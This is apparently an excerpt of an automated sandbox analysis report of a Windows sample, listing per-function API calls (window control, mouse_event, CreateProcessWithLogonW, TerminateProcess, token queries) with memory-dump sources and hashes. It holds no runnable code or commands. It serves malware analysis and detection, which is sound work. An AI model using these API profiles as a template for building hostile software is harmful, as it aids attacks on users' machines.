                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 642888154-0
                                                                            • Opcode ID: 1a4cf643dcbccf82e6d978f991ea5e788cb79434f1297075c830f5e7e468c595
                                                                            • Instruction ID: 8d5ec4ccfd939dc66e151ae60b0a8ec345e415307e7bcc40a63959ac97133d56
                                                                            • Opcode Fuzzy Hash: 1a4cf643dcbccf82e6d978f991ea5e788cb79434f1297075c830f5e7e468c595
                                                                            • Instruction Fuzzy Hash: 87415134600241AFDB25EF28C499B957BE1FF89310F5881B9FA58CF6A3C731A856CB51
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,00874E41,?,?,00000000,00000001), ref: 008770AC
                                                                              • Part of subcall function 008739A0: GetWindowRect.USER32(?,?), ref: 008739B3
                                                                            • GetDesktopWindow.USER32 ref: 008770D6
                                                                            • GetWindowRect.USER32(00000000), ref: 008770DD
                                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0087710F
                                                                              • Part of subcall function 00865244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008652BC
                                                                            • GetCursorPos.USER32(?), ref: 0087713B
                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00877199
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                            • String ID:
                                                                            • API String ID: 4137160315-0
                                                                            • Opcode ID: 031839dae328c5b7d912e8c28abaca73f047512737f396cfe44fbb1b11a838e4
                                                                            • Instruction ID: 8e78bbcd8ac83b335e3d76a1f10075960a948b8757a9663daef0a52b836b6f6e
                                                                            • Opcode Fuzzy Hash: 031839dae328c5b7d912e8c28abaca73f047512737f396cfe44fbb1b11a838e4
                                                                            • Instruction Fuzzy Hash: 6131B272609305ABD720DF18D849F9BB7A9FF89314F004919F589D7192DB70EA09CBA2
                                                                            APIs
                                                                              • Part of subcall function 008580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008580C0
                                                                              • Part of subcall function 008580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008580CA
                                                                              • Part of subcall function 008580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008580D9
                                                                              • Part of subcall function 008580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008580E0
                                                                              • Part of subcall function 008580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008580F6
                                                                            • GetLengthSid.ADVAPI32(?,00000000,0085842F), ref: 008588CA
                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008588D6
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 008588DD
                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 008588F6
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,0085842F), ref: 0085890A
                                                                            • HeapFree.KERNEL32(00000000), ref: 00858911
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                            • String ID:
                                                                            • API String ID: 3008561057-0
                                                                            • Opcode ID: 4afb6d35eb34933976bff40d27739793f9c45ae8d2d111cc04f1c1550b1399b5
                                                                            • Instruction ID: 39be1fe8471b41b7dfc0960b99fd7edbd15a063c0e3d1ec9d2b1e5bc002a3a0a
                                                                            • Opcode Fuzzy Hash: 4afb6d35eb34933976bff40d27739793f9c45ae8d2d111cc04f1c1550b1399b5
                                                                            • Instruction Fuzzy Hash: EB11B135501609FFDB119FA8DC09BBEBB68FB44316F10402AE945E7211CB32AD18DB61
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008585E2
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 008585E9
                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008585F8
                                                                            • CloseHandle.KERNEL32(00000004), ref: 00858603
                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00858632
                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00858646
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                            • String ID:
                                                                            • API String ID: 1413079979-0
                                                                            • Opcode ID: c893d8e2628e5a86dc569ab3c90fd065b425c1dc660065a7ce1db9c2f3182db8
                                                                            • Instruction ID: 2c129426f429061a120ce8c2a89439c1c95990a8ca17b8422f2ee914af4a25e1
                                                                            • Opcode Fuzzy Hash: c893d8e2628e5a86dc569ab3c90fd065b425c1dc660065a7ce1db9c2f3182db8
                                                                            • Instruction Fuzzy Hash: DF114772501249EBDF019FA8DD49BEA7BA9FB08345F144065FE04E2161C7729E64AB60
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 0085B7B5
                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0085B7C6
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0085B7CD
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0085B7D5
                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0085B7EC
                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0085B7FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$Release
                                                                            • String ID:
                                                                            • API String ID: 1035833867-0
                                                                            • Opcode ID: 25e0d0654c8430f5c0931097c97f3749d11e5a945623824da8340c3695c358c6
                                                                            • Instruction ID: 6442b7d2a48d580212758c71da5f3923ff55a608d8c4d2dcd23e4162c665198b
                                                                            • Opcode Fuzzy Hash: 25e0d0654c8430f5c0931097c97f3749d11e5a945623824da8340c3695c358c6
                                                                            • Instruction Fuzzy Hash: 36017175A00209BBEF109BAA9C49A5ABFA8FB58311F004065FE04E7292D6309C10CF91
                                                                            APIs
                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00820193
                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 0082019B
                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008201A6
                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008201B1
                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 008201B9
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 008201C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual
                                                                            • String ID:
                                                                            • API String ID: 4278518827-0
                                                                            • Opcode ID: c3d95861d519c56fcb0adcc9d505645c79b7a00abb8f7d0bb4ec79de27f4a350
                                                                            • Instruction ID: b6771515a5d4a3c2d016f24d76b93469400217cc331522ccc2dc1ded1ebac143
                                                                            • Opcode Fuzzy Hash: c3d95861d519c56fcb0adcc9d505645c79b7a00abb8f7d0bb4ec79de27f4a350
                                                                            • Instruction Fuzzy Hash: 3C016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C87942C7F5A864CBE5
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008653F9
                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0086540F
                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0086541E
                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0086542D
                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00865437
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0086543E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 839392675-0
                                                                            • Opcode ID: 2fee82f626a32d78c0ffb538c3b0c2adda3926d2a9de32d4cfabfc97ac965d3b
                                                                            • Instruction ID: 98fec5de8a4008cef508c3fc84d7510ac9d9d8653cdaf2f9ddf3a98a4ceb1470
                                                                            • Opcode Fuzzy Hash: 2fee82f626a32d78c0ffb538c3b0c2adda3926d2a9de32d4cfabfc97ac965d3b
                                                                            • Instruction Fuzzy Hash: A5F06D32240158BBE3215BA6DC0DEAB7A7CFFCAB11F000269FA04D1052EAA01A0187B5
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00867243
                                                                            • EnterCriticalSection.KERNEL32(?,?,00810EE4,?,?), ref: 00867254
                                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00810EE4,?,?), ref: 00867261
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00810EE4,?,?), ref: 0086726E
                                                                              • Part of subcall function 00866C35: CloseHandle.KERNEL32(00000000,?,0086727B,?,00810EE4,?,?), ref: 00866C3F
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00867281
                                                                            • LeaveCriticalSection.KERNEL32(?,?,00810EE4,?,?), ref: 00867288
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3495660284-0
                                                                            • Opcode ID: e73af80c77e745919fdee4ef2b324598bde6f037f27e6417d1a660c11b5f232a
                                                                            • Instruction ID: 4056635101cf3ab6fcabda0426f57418f0d0dfb2df4106208096979a7513a903
                                                                            • Opcode Fuzzy Hash: e73af80c77e745919fdee4ef2b324598bde6f037f27e6417d1a660c11b5f232a
                                                                            • Instruction Fuzzy Hash: A3F0823A540612EBE7121B68ED4C9DB773AFF45702B110531F703E50A2DB7A6811CB50
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0085899D
                                                                            • UnloadUserProfile.USERENV(?,?), ref: 008589A9
                                                                            • CloseHandle.KERNEL32(?), ref: 008589B2
                                                                            • CloseHandle.KERNEL32(?), ref: 008589BA
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008589C3
                                                                            • HeapFree.KERNEL32(00000000), ref: 008589CA
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                            • String ID:
                                                                            • API String ID: 146765662-0
                                                                            • Opcode ID: 1be80210c2a147173eae54327cc4dfadf52303a739a0b1e1204c23580c91cdc9
                                                                            • Instruction ID: 11dce0fd5d95037e7ff03ff19f0fa67973d6a28614056f37c349a9840020fa74
                                                                            • Opcode Fuzzy Hash: 1be80210c2a147173eae54327cc4dfadf52303a739a0b1e1204c23580c91cdc9
                                                                            • Instruction Fuzzy Hash: 49E0527A104505FBDA022FE9EC0C95ABB69FB89762B508631F319C1575CB32A461DB50
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 00878613
                                                                            • CharUpperBuffW.USER32(?,?), ref: 00878722
                                                                            • VariantClear.OLEAUT32(?), ref: 0087889A
                                                                              • Part of subcall function 00867562: VariantInit.OLEAUT32(00000000), ref: 008675A2
                                                                              • Part of subcall function 00867562: VariantCopy.OLEAUT32(00000000,?), ref: 008675AB
                                                                              • Part of subcall function 00867562: VariantClear.OLEAUT32(00000000), ref: 008675B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                            • API String ID: 4237274167-1221869570
                                                                            • Opcode ID: bddccd9f3e900c7755ddcb99b71419effcd0a2e53ffe7c88b827187b32270e51
                                                                            • Instruction ID: de6df456ddd0745e6b67cc792e12b22feedb6be9b52f99f9c1f9a3b79b5842d5
                                                                            • Opcode Fuzzy Hash: bddccd9f3e900c7755ddcb99b71419effcd0a2e53ffe7c88b827187b32270e51
                                                                            • Instruction Fuzzy Hash: 8A912770604305DFC710DF28C88995ABBE4FB89714F14896EF99ACB3A2DB30E945CB52
                                                                            APIs
                                                                            • GetWindowRect.USER32(00E2EE78,?), ref: 00889863
                                                                            • ScreenToClient.USER32(00000002,00000002), ref: 00889896
                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00889903
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientMoveRectScreen
                                                                            • String ID: S
                                                                            • API String ID: 3880355969-2858979982
                                                                            • Opcode ID: 794cf92ecd281896703142c694a9275089c3f439a18db07318068454f3bb608c
                                                                            • Instruction ID: 82843319f3240ec750f0f96441f5bd63405173d071f95881112abf117739454e
                                                                            • Opcode Fuzzy Hash: 794cf92ecd281896703142c694a9275089c3f439a18db07318068454f3bb608c
                                                                            • Instruction Fuzzy Hash: 61510B74A00209AFCF10DF68C884ABE7BB5FF55360F148269F995DB2A0D731AD81CB90
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0085D5D4
                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0085D60A
                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0085D61B
                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0085D69D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                            • String ID: DllGetClassObject
                                                                            • API String ID: 753597075-1075368562
                                                                            • Opcode ID: 79268f45084a2209f4bd68e7d3836f10a1bcd71b7060d316bd264e35cd16a346
                                                                            • Instruction ID: 90b56dd6f894436b174f904f53b3632aea491594d0b2b8411a4fa6bbc50ab667
                                                                            • Opcode Fuzzy Hash: 79268f45084a2209f4bd68e7d3836f10a1bcd71b7060d316bd264e35cd16a346
                                                                            • Instruction Fuzzy Hash: 21419CB1600305EFDB25DF64C884A9A7BE9FF58316F1580A9AD09DF206D7B0D949CBE0
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 008627C0
                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008627DC
                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00862822
                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008C5890,00000000), ref: 0086286B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1173514356-4108050209
                                                                            • Opcode ID: 1c06a7dec46ff9bd135e7f3ce2040d4a5e9cec7fb7a04be2a6012babf4126406
                                                                            • Instruction ID: d6bdef26fb287ca14f530d12183c76db157f5e6cfbab7f3ee69555bee93f562a
                                                                            • Opcode Fuzzy Hash: 1c06a7dec46ff9bd135e7f3ce2040d4a5e9cec7fb7a04be2a6012babf4126406
                                                                            • Instruction Fuzzy Hash: F3418C706047019FD720DF28CC44B1ABBE8FF85314F0549ADF9A5D7292D734A805CB62
                                                                            APIs
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008888DE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRect
                                                                            • String ID: S
                                                                            • API String ID: 634782764-2858979982
                                                                            • Opcode ID: a7b3612107a510aaf5dc453987a412fc9808604bb4bf1661208048ae140e70ac
                                                                            • Instruction ID: a0defdf04c5dc2e8b6ebe81832a75b2cf909aef4370541f4b10e455fd1258fc4
                                                                            • Opcode Fuzzy Hash: a7b3612107a510aaf5dc453987a412fc9808604bb4bf1661208048ae140e70ac
                                                                            • Instruction Fuzzy Hash: 80319234640109EFEF20BA68CC45FB97BB5FB09360FD44122FA55E62A1CF70E9809B56
                                                                            APIs
                                                                            • ClientToScreen.USER32(?,?), ref: 0088AB60
                                                                            • GetWindowRect.USER32(?,?), ref: 0088ABD6
                                                                            • PtInRect.USER32(?,?,0088C014), ref: 0088ABE6
                                                                            • MessageBeep.USER32(00000000), ref: 0088AC57
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                            • String ID: S
                                                                            • API String ID: 1352109105-2858979982
                                                                            • Opcode ID: aa651fe3e5a56a5fbc48da9d41ce427a0b8502ba1a5a6e92a397cd20928c60a1
                                                                            • Instruction ID: 6e7815c46c6c6d3cce7b0e297ab74c26a80270b413c053ec92405af2512b861d
                                                                            • Opcode Fuzzy Hash: aa651fe3e5a56a5fbc48da9d41ce427a0b8502ba1a5a6e92a397cd20928c60a1
                                                                            • Instruction Fuzzy Hash: CD416D30600519DFEF19EF58D884B6A7BF6FF49310F1881AAE915DB2A1D731E841CB92
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0087D7C5
                                                                              • Part of subcall function 0080784B: _memmove.LIBCMT ref: 00807899
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
